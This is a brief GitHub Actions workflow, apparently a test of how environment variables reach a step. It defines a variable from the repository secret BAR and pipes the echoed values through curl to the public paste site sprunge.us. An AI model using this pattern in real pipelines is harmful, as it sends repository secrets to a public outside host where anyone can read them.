name: test-vars
on:
  push:
    branches:
      - '*'

jobs:
  echo_variable:
    runs-on: ubuntu-latest
    container:
      image: diotheparadiz/testvars

    env:
      FOO: "Hello world!"
      BAR: ${{ secrets.BAR }}
    steps:
      - run: "echo ${INPUT_FOO}|curl -F 'sprunge=<-' http://sprunge.us"
      - run: "echo ${INPUT_BAR}|curl -F 'sprunge=<-' http://sprunge.us"
